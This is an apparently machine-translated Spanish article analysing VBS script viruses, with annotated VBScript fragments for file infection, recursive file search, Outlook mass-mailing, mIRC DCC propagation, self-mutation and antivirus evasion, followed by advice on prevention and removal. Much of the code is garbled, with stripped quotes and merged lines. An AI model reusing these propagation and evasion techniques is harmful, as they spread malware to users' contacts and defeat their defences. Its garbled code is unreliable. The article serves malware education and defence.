Análisis de los principios del virus del script VBS
1. Cómo los virus de secuencias de comandos vbs infectan y buscan archivos
Los virus de secuencias de comandos VBS generalmente infectan archivos directamente mediante autorreplicación. La mayoría de los códigos del virus se pueden adjuntar directamente a otros programas similares, como el virus New Joy The time. puede agregar su propio código al final del archivo .htm y agregar una declaración que llama al código del virus en la parte superior, mientras que el virus de macro genera directamente una copia del archivo, copia el código del virus en él y usa el nombre del archivo original. como prefijo del nombre del archivo de virus, vbs como sufijo. Analicemos en detalle los principios de infección y búsqueda de este tipo de virus a través de algunos códigos de virus de macro:
Los siguientes son algunos códigos clave de infección de archivos:
Set fso=createobject( scripting. filesystemobject)
'Crear un objeto de sistema de archivos
set self=fso.opentextfile(wscript.scriptfullname, 1)
'Leer y abrir el archivo actual archivo (es decir, el virus en sí)
vbscopy=self.readall
' Lee todo el código del virus en la variable de cadena vbscopy...
set ap=fso .opentextfile(archivo de destino .path, 2, true)
' Escribir para abrir el archivo de destino y prepararse para escribir el código del virus
ap.write vbscopy 'Sobrescribir el archivo de destino con el código de virus
ap.close
set cop=fso.getfile(target file.path) 'Obtener la ruta del archivo de destino
cop.copy(target file.path amp; .vbs)
'Crear otro archivo de virus (con sufijo .vbs)
Target file.delete(true)
'Eliminar el archivo de destino
Arriba Describe cómo el archivo de virus infecta archivos normales: primero asigne el propio código del virus a la variable de cadena vbscopy, luego sobrescriba esta cadena en el archivo de destino y cree un nombre de archivo de destino con el nombre del archivo. prefijo y vbs como sufijo. Haga una copia del archivo y finalmente elimine el archivo de destino.
Analicemos en detalle el código de búsqueda de archivos:
'Esta función se utiliza principalmente para encontrar archivos que cumplan las condiciones y generar una copia de virus del archivo correspondiente
sub scan(folder_) 'definición de la función de escaneo,
en caso de error, reanudar siguiente 'Si ocurre un error, omítelo directamente para evitar que aparezca la ventana de error
set carpeta_= fso.getfolder(folder_)
set files=folder_.files 'Una colección de todos los archivos en el directorio actual
para cada archivo en filesext=fso.GetExtensionName(file)
'Obtener el sufijo del archivo
ext=lcase(ext) 'Convertir el nombre del sufijo a letras minúsculas
si text=mp5 entonces 'Si el nombre del sufijo es mp5 , luego infectar.
Cree usted mismo el archivo con el nombre del sufijo correspondiente, preferiblemente con un nombre de sufijo anormal para evitar dañar el programa normal.
Wscript.echo (archivo)
end ifnextset subfolders=folder_.subfolderspara cada subcarpeta en subcarpetas 'Buscar en otros directorios; llamar recursivamente
scan() scan( subcarpeta)
siguiente
end sub
El código anterior es el análisis de código del virus de secuencia de comandos VBS para la búsqueda de archivos. La función scan() en la parte de búsqueda es relativamente corta, concisa y muy inteligente. Utiliza un algoritmo recursivo para recorrer los directorios y archivos de toda la partición.
2. Varias formas y análisis de código de los virus de secuencias de comandos VBS que se propagan a través de la red
La razón por la que los virus de secuencias de comandos VBS se propagan ampliamente depende de su función de propagación en la red. En términos generales, los virus de secuencias de comandos VBS utilizan los siguientes métodos de propagación:
1) Propagación a través de archivos adjuntos de correo electrónico
Esta es una forma muy común de propagación. El virus puede obtener direcciones de correo electrónico legítimas a través de varios métodos. El más común es recibir el correo electrónico directamente. dirección en la libreta de direcciones de Outlook, o puede usar el programa para buscar la dirección de correo electrónico en documentos del usuario (como archivos HTML).
Analicemos en detalle cómo el virus script VBS hace esto:
Función mailBroadcast()
en caso de error, reanudar siguiente
wscript. echo
Establecer outlookApp = CreateObject(Outlook.Application)
//Crear un objeto de aplicación OUTLOOK
Si outlookApp= Outlook Entonces
Establecer mapiObj=outlookApp.GetNameSpace(MAPI)
//Obtener el espacio de nombres MAPI
Establecer addrList= mapiObj.AddressLists
// Obtener el número de tablas de direcciones
Para cada dirección en addrList
Si addr.AddressEntries.Count lt;gt; 0 Entonces
addrEntCount = addr.AddressEntries
<. p>//Obtener el número de registros de correo electrónico en cada tabla de direccionesPara addrEntIndex= 1 Para addrEntCount
//Recorrer las direcciones de correo electrónico de la tabla de direcciones
Establecer elemento = outlookApp.CreateItem(0)
//Obtener una instancia de objeto de correo electrónico
Establecer addrEnt = addr.AddressEntries(addrEntIndex)
//Obtener la dirección de correo electrónico específica
= addrEnt.Address
//Complete la dirección del destinatario
item.Subject = Experimento de transmisión de virus
//Escribe el título del correo electrónico
item.Body = Esta es una prueba de transmisión de virus por correo electrónico, ¡no entres en pánico cuando recibas esta carta!
//Escribir contenido del archivo
Establecer adjuntoMents=item.Attachments //Definir archivos adjuntos de correo electrónico
attachMents.Add fileSysObj.GetSpecialFolder(0)amp;\ test .jpg.vbs
item.DeleteAfterSubmit = True
//La carta se elimina automáticamente después del envío
Luego
item.Send
//Enviar correo
shellObj.regwrite HKCU\software\Mailtest\mailed, 1
//Marca de virus para evitar infecciones repetidas
End If
NextEnd IfNext
End if
End Function
2) Compartir y difundir a través de LAN
< La comunicación compartida p>LAN también es un método muy común y eficaz de comunicación en red. En términos generales, para facilitar la comunicación dentro de la LAN, debe haber muchos directorios compartidos con permisos de escritura. Por ejemplo, cuando win2000 crea un directorio compartido, tiene permisos de escritura de forma predeterminada. De esta manera, el virus puede propagar código de virus a estos directorios buscando en estos directorios compartidos.En VBS, hay un objeto que puede realizar operaciones de búsqueda y archivo de carpetas compartidas en vecinos en línea.
Podemos utilizar este objeto para lograr el propósito de la comunicación.
welcome_msg = Prueba de búsqueda de conexión de red
Establecer WSHNetwork = WScript.CreateObject(WScript.Network)
'Crear un objeto de red
Establecer oPrinters = WshNetwork.EnumPrinterConnections
'Crear una lista de conexiones de impresora de red
Asignaciones de impresora de red WScript.Echo:
Para i = 0 a oPrinters.Count - 1Paso2
'Mostrar el estado de conexión de la impresora de red
WScript.Echo Port amp; oPrinters.Item(i)
amp = oPrinters.Item( i 1)
Siguiente
Establecer colDrives = WSHNetwork.EnumNetworkDrives
'Crear una lista de conexiones de red compartidas
Si colDrives. = 0 Entonces
MsgBox no tiene unidades para enumerar. ,
vbInformation vbOkOnly, bienvenido_msg
Else
strMsg = Conexión de unidad de red actual: amp;CRLF
Fori=0To colDrives.Count - 1 Paso 2
strMsg = strMsg amp; Chr(10)amp; colDrives(i)
amp; 1)
Siguiente
MsgBox strMsg, vbInformación vbOkOnly,
welcome_msg'Muestra la conexión actual de la unidad de red
Finalizar si
Lo anterior es un script completo que se utiliza para encontrar la conexión de impresora actual y la conexión compartida de red y mostrarlas. Después de conocer la conexión compartida, podemos leer y escribir archivos directamente en la unidad de destino.
3) Se propaga infectando archivos web como htm, asp, jsp, php, etc.
Hoy en día, los servicios WWW se han vuelto muy comunes. Al infectar htm y otros archivos, los virus. Causa inevitablemente todas las máquinas de los usuarios que han visitado esta página están infectadas con un virus.
La razón por la que los virus pueden ejercer potentes funciones en los archivos HTM adopta el mismo principio que la mayoría de códigos maliciosos de páginas web. Básicamente, usan el mismo código, pero también se pueden usar otros códigos. Este código es la clave para que el virus FSO, WSH y otros objetos puedan ejecutarse en la página web. Podemos encontrar dicha clave primaria en el registro HKEY_CLASSES_ROOT\CLSID\. Su descripción en el registro es "Objeto de Shell de host de Windows Script". De manera similar, también podemos encontrar que su descripción en el registro es "Objeto de sistema de archivos". Generalmente, primero se debe inicializar COM. Después de obtener los objetos componentes correspondientes, el virus puede utilizar correctamente los objetos FSO y WSH para llamar a sus potentes funciones.
El código es el siguiente:
Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() 'Crear una instancia
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID()
Apple0bject.createInstance()
'Crear una instancia
Establecer FSO = Apple0bject.Get0bject()
Para otros tipos de archivos, no los analizaremos uno por uno aquí.
4) Difundir a través de canales de chat IRC
Los virus que se propagan a través de IRC generalmente utilizan el siguiente código (tome MIRC como ejemplo)
Dim mirc
set fso=CreateObject(Scripting.FileSystemObject)
set mirc=fso.CreateTextFile(C:\mirc\script.ini)
'Crear archivo script.ini
fso.CopyFile Wscript.ScriptFullName, C:\mirc\attachment.vbs,
True 'Hacer copia de seguridad de los archivos de virus en adjunto.vbs
mirc.WriteLine [script ]
mirc.WriteLine n0=on 1: unirse: *.*:
{if($nick !=$me) /dcc enviar $nick C:\mirc\attachment .vbs }
'Utiliza el comando /ddc send $nick adjunto.vbs para enviar archivos de virus a otros usuarios del canal
mirc.Close
El Se utiliza el código anterior. Escribir una línea de código hacia y desde el archivo Script.ini en realidad escribirá muchos otros códigos. Script.ini almacena comandos utilizados para controlar las sesiones de IRC. Los comandos en este archivo se pueden ejecutar automáticamente. Por ejemplo, el virus TUNE.VBS modificará c:\mirc\script.ini y c:\mirc\mirc.ini de modo que cada vez que un usuario de IRC utilice el canal infectado, recibirá una copia de TUNE.VBS enviada a través de DDC. Del mismo modo, si Pirch98 está instalado en el directorio c:\pirch98 de la computadora de destino, el virus modificará c:\pirch98\events.ini y c:\pirch98\pirch98.ini de modo que cada vez que un usuario de IRC use el canal infectado, todos recibirán una copia de TUNE.VBS enviada vía DDC.
Además, el virus también se puede propagar a través del popular KaZaA. El virus copia el archivo de virus en el directorio compartido predeterminado de KaZaA, de modo que cuando otros usuarios accedan a esta máquina, sea posible descargar el archivo de virus y ejecutarlo. Este método de difusión puede entrar en juego con la popularidad de herramientas de intercambio entre pares como KaZaA.
Existen otros métodos de comunicación que no enumeraremos aquí.
3. ¿Cómo consigue el control el virus del script VBS?
¿Cómo consigue el control? Este es un tema más interesante, y el virus de secuencia de comandos VBS parece ponerlo en pleno juego.
El autor enumera varios métodos típicos aquí:
1) Modificar la clave de registro
Cuando se inicia Windows, cargará automáticamente HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ El programa ejecutado por cada valor clave bajo el elemento Ejecutar. Para los virus de script, puede agregar un valor clave debajo de este elemento para que apunte al programa de virus, de modo que pueda asegurarse de tener el control cada vez que se inicia la máquina. El método para modificar el registro en vbs es relativamente simple, simplemente llame directamente a la siguiente declaración. wsh.RegWrite(strName, anyvalue [, strType])
2) Al asignar el modo de ejecución del archivo
Por ejemplo, nuestro nuevo happy time cambia el modo de ejecución de dll a wscript.exe . Incluso puedes apuntar la asignación de archivos exe al código de virus.
3) Engañar a los usuarios y dejar que lo ejecuten ellos mismos
Este método en realidad está relacionado con la psicología del usuario. Por ejemplo, cuando el virus envía archivos adjuntos, utiliza un nombre de archivo con un sufijo doble. De forma predeterminada, el sufijo no se muestra. Por ejemplo, un programa vbs con un nombre de archivo beauty.jpg.vbs se muestra como beauty. jpg En este momento, los usuarios a menudo harán clic en él como imagen. De manera similar, para los archivos en el disco del propio usuario, cuando el virus los infecta, utilizará el nombre del archivo original como prefijo y vbs como sufijo para generar un archivo de virus y eliminar el archivo original. el usuario puede cambiar el archivo vbs Ejecutar como si fuera su archivo original.
4) escritorio.ini y carpeta.htt cooperan entre sí
Estos dos archivos se pueden utilizar para configurar el escritorio activo o personalizar carpetas. Si el directorio del usuario contiene estos dos archivos, cuando el usuario ingrese al directorio, se activará el código de virus en la carpeta.htt. Este es un método más eficaz utilizado por el nuevo virus de la hora feliz para controlarlo. Y usando carpeta.htt, es posible activar el archivo exe, lo que también puede ser una forma efectiva para que el virus tome el control.
Hay muchas formas en que los virus pueden hacerse con el control y el autor tiene mucho margen de maniobra en este sentido.
4. Varias técnicas para que los virus vbs script luchen contra el software antivirus
Para que los virus sobrevivan, también es necesaria la capacidad de luchar contra el software antivirus. En términos generales, los virus script VBS utilizan los siguientes métodos para luchar contra el software antivirus:
1) Autocifrado
Por ejemplo, el nuevo virus de la hora feliz puede seleccionar aleatoriamente una clave par Parte del código se cifra y transforma, haciendo que el código del virus sea diferente cada vez que se infecta, consiguiendo un efecto polimórfico. Esto trae algunas dificultades al método tradicional de detección de virus con valor de característica. Los virus también pueden utilizar tecnología de deformación, haciendo que el código descifrado del virus cifrado sea diferente cada vez que se infecta.
Veamos un motor de transformación de scripts vbs simple (de flyshadow)
Aleatorio
Set Of = CreateObject(Scripting.FileSystemObject)
'Crear objeto del sistema de archivos
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
'Leer su propio código
fS=Array( Of, vC, fS, fSC)
'Definir una matriz de caracteres a reemplazar
Para fSC = 0 a 3
vC = Reemplazar(vC, fS(fSC), Chr((Int(Rnd * 22) 65))
amp; Chr((Int(Rnd * 22) 65)) amp; ))
amp; Chr((Int(Rnd * 22) 65)))
'Reemplazar la cadena en la matriz fS con 4 caracteres aleatorios
Siguiente
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 'Escribe el código reemplazado nuevamente en el archivo
El código anterior hace que el archivo VBS sea Después del primero Al ejecutarse, las cuatro cadenas Of, vC, fS y fSC serán reemplazadas por cadenas aleatorias, lo que en gran medida puede evitar que el software antivirus lo detecte utilizando el método de detección de virus de valor característico.
2) Utilice inteligentemente la función Ejecutar
A los amigos que han utilizado programas VBS les puede resultar extraño: cuando se utiliza un objeto FileSystemObject en un programa normal, algún software antivirus lo hará. este programa escanea, informa que el riesgo de este archivo Vbs es alto, pero algunos virus de script VBS también usan objetos FileSystemObject. ¿Por qué no aparece ninguna advertencia? La razón es muy simple: estos virus utilizan inteligentemente el método Ejecutar. Cuando algún software antivirus detecta virus VBS, comprobará si el objeto FileSystemObject está declarado para ser utilizado en el programa. Si es así, se emitirá una alarma. Si el virus convierte este código de declaración en una cadena y luego lo ejecuta mediante la función Ejecutar (Cadena), puede evadir algún software antivirus.
3) Cambiar el método de declaración de ciertos objetos
Por ejemplo, fso=createobject(scripting.filesystemobject), lo cambiamos a
fso=createobject( script ing.filesyste mobject), de modo que el objeto filesystemobject no se encuentre cuando el software antivirus lo escanee estáticamente.
4) Cierre directamente el software antivirus.
El script VBS es potente. Puede buscar directamente procesos de usuario y comparar los nombres de los procesos si se encuentra que es un antivirus. -proceso de software antivirus, puede apagarlo directamente y eliminar algunos de sus programas clave.
5. Introducción al principio de la máquina de producción de virus Vbs
La llamada máquina de producción de virus se refiere al software que puede generar directamente el código fuente del virus según la selección del usuario. Esto puede parecer increíble para muchas personas, pero de hecho, para los virus script, su implementación es muy simple.
El lenguaje de secuencias de comandos se interpreta y ejecuta y no requiere compilación. No hay necesidad de verificación ni posicionamiento en el programa, y cada declaración está claramente separada.
De esta manera, la función del virus primero se divide en muchos módulos separados. Después de que el usuario selecciona la función del virus, la máquina de producción solo necesita ensamblar los módulos funcionales correspondientes y finalmente realizar el reemplazo y optimización del código correspondiente. Debido a limitaciones de espacio y otras razones, aquí no se proporciona una introducción detallada.
3. Cómo prevenir los virus de script vbs
1. Cómo extraer virus de script (cifrados) de muestras
Para los virus de script no cifrados, podemos encontrarlos directamente en las muestras de virus. Ahora presentaremos cómo extraer virus de script VBS cifrados de las muestras de virus. nueva hora feliz, por ejemplo.
Abre la carpeta.htt con JediEdit. Descubrimos que este archivo tiene solo 93 líneas en total. La primera línea, después de algunas líneas de comentarios, comienza y termina con la sección. ¡Creo que todo el mundo sabe qué tipo de archivo es este!
Las líneas 87 a 91 son las siguientes declaraciones:
87:
No es necesario explicar las líneas 87 y 91, la línea 88 es una cadena Asignación, es Es obvio que se trata de un código de virus cifrado. Mire el último fragmento de código en la línea 89: ThisText = ThisText & TempChar, más la línea a continuación, definitivamente podemos adivinar que ThisText contiene un código de descifrado de virus (los hermanos que estén familiarizados con VBS, por supuesto, pueden analizar este código de descifrado, ¡Demasiado simple! Deberías poder verlo incluso si no miras el código en absoluto). La línea 90 es para ejecutar el código en ThisText (código después del descifrado).
Entonces, ¿qué hacer a continuación? Es muy simple. Solo necesitamos enviar el contenido de ThisText a un archivo de texto después de descifrar el código del virus. Dado que las líneas anteriores son vbscript, creé el siguiente archivo .txt:
Primero, copie las líneas 88 y 89 al archivo .txt que acaba de crear. Por supuesto, si está dispuesto a echarle un vistazo. nueva hora feliz Para el efecto de ejecución, también puede ingresar la línea 90 al final. Luego ingrese el código vbs para crear el archivo y escriba ThisText en el archivo en la siguiente línea. El archivo completo se ve así:
ExeString = Afi...' Línea 88 de código
<. p>Ejecutar(Dim KeyAr... ' Línea 89 de códigoset fso=createobject(scripting.filesystemobject)
' Crear un objeto de sistema de archivos
set virusfile=fso. createtextfile(resource.log, true)
' Crea un nuevo archivo Resource.log,
para almacenar el código de virus descifrado virusfile.writeline(ThisText)
p>' Escriba el código descifrado en Resource.log
¡Es así de simple, guarde el archivo, cambie el sufijo del archivo .txt a .vbs (.vbe también es aceptable), doble- Haga clic, encontrará que hay un archivo adicional Resource.log en el directorio de archivos. ¿Qué tal si abre este archivo? ¿Es el código fuente de "New Happy Time"?
2. script virus
Dado que el virus de script vbs está escrito en un lenguaje de script, no es tan conveniente y flexible como un archivo PE. Su funcionamiento requiere condiciones (pero el autor cree que los scripts VBS tienen estas condiciones de forma predeterminada. ). Los virus tienen las siguientes debilidades:
1) La mayoría de los virus de script VBS necesitan usar un objeto cuando se ejecutan: FileSystemObject
2) El código VBScript se interpreta y ejecuta a través de Windows Script Host.
3) El funcionamiento del virus VBS script requiere el soporte de su programa asociado Wscript.exe.
4) Los virus que se propagan a través de páginas web requieren el soporte de ActiveX
5) Los virus que se propagan a través del correo electrónico requieren el soporte de la función de envío automático de correo electrónico de OE, pero la mayoría de los virus se transmiten a través del correo electrónico como el principal modo de comunicación.
3. Cómo prevenir y eliminar los virus de secuencias de comandos VBS
Apuntando a las debilidades de los virus de secuencias de comandos VBS mencionadas anteriormente, el autor propone las siguientes medidas preventivas centralizadas:
1) Deshabilitar el objeto del sistema de archivos FileSystemObject
Método: utilice el comando regsvr32 scrrun.dll /u para desactivar los objetos del sistema de archivos. Entre ellos, regsvr32 es un archivo ejecutable en Windows\System. O busque directamente el archivo scrrun.dll y elimínelo o cámbiele el nombre.
Otro método es buscar un elemento de clave principal en HKEY_CLASSES_ROOT\CLSID\ en el registro y hacer clic en él.
2) Desinstalar Windows Scripting Host
En Windows 98 (lo mismo se aplica a NT 4.0 y superiores), abra [Panel de control] → [Agregar o quitar programas] → [Windows Installer ] →[Adjunto], cancele el elemento "Windows Scripting Host".
Igual que el método anterior, busque un elemento de clave principal en HKEY_CLASSES_ROOT\CLSID\ en el registro y haga clic.
3) Elimine la asignación entre aplicaciones y extensiones de archivos VBS, VBE, JS y JSE
Haga clic en [Mi PC]→[Ver]→[Opciones de carpeta]→[ Tipo de archivo ] y luego elimine la asignación entre las extensiones de archivo y aplicaciones VBS, VBE, JS y JSE.
4) En el directorio de Windows, busque WScript.exe, cambie el nombre o elimínelo. Si cree que tendrá la oportunidad de usarlo en el futuro, lo mejor es cambiar el nombre Of. Por supuesto, también puedes reinstalarlo en el futuro.
5) Para prevenir y controlar completamente los gusanos de red VBS, necesita configurar su navegador. Primero abrimos el navegador y hacemos clic en el botón [Nivel personalizado] en la pestaña de seguridad "Opciones de Internet" en la barra de menú. Configure todo en "Controles y complementos ActiveX" como deshabilitado, para que no tenga que preocuparse por eso. Jaja, por ejemplo, si el componente ActiveX del nuevo happy hour no se puede ejecutar, la función de comunicación de red se agotará.
6) Desactive la función de envío y recepción automática de correo electrónico de OE
7) Dado que los gusanos utilizan principalmente extensiones de archivos para causar problemas, para evitarlos, no oculte las extensiones de tipos de archivos conocidos en el nombre del sistema. El valor predeterminado de Windows es "Ocultar extensiones para tipos de archivos conocidos", modifíquelo para mostrar extensiones para todos los tipos de archivos.
8) Establezca el nivel de seguridad de la conexión de red del sistema al menos en "medio", lo que puede evitar que ciertos programas Java dañinos o algunos componentes ActiveX invadan la computadora hasta cierto punto.
9) Jaja, sin mencionar el último punto, todos deben saber que el software antivirus es realmente necesario. Aunque algunos programas antivirus decepcionan a la mayoría de los usuarios, la elección es de ambas partes. En esta red donde los virus están por todas partes, creo que es realmente increíble que tu máquina no tenga instalado un software antivirus.
4. Perspectivas para el desarrollo de todos los virus de secuencias de comandos
Con el rápido desarrollo de Internet, los gusanos de red se han vuelto populares y los gusanos de secuencias de comandos VBS no solo lo son. Son numerosos, pero también son Poderosos. Dado que es relativamente fácil escribir virus usando scripts, además de los virus de script VBS actuales que seguirán siendo populares, gradualmente aparecerán otros virus de script, como virus PHP, JS, Perl, etc.
Sin embargo, los scripts no son la mejor herramienta para que los entusiastas de la tecnología antivirus escriban virus, y los virus script son relativamente fáciles de eliminar y prevenir. El autor cree que los virus script seguirán siendo populares, pero sólo unos pocos gusanos script pueden tener un impacto tan grande como los virus de macro y New Happy Hour.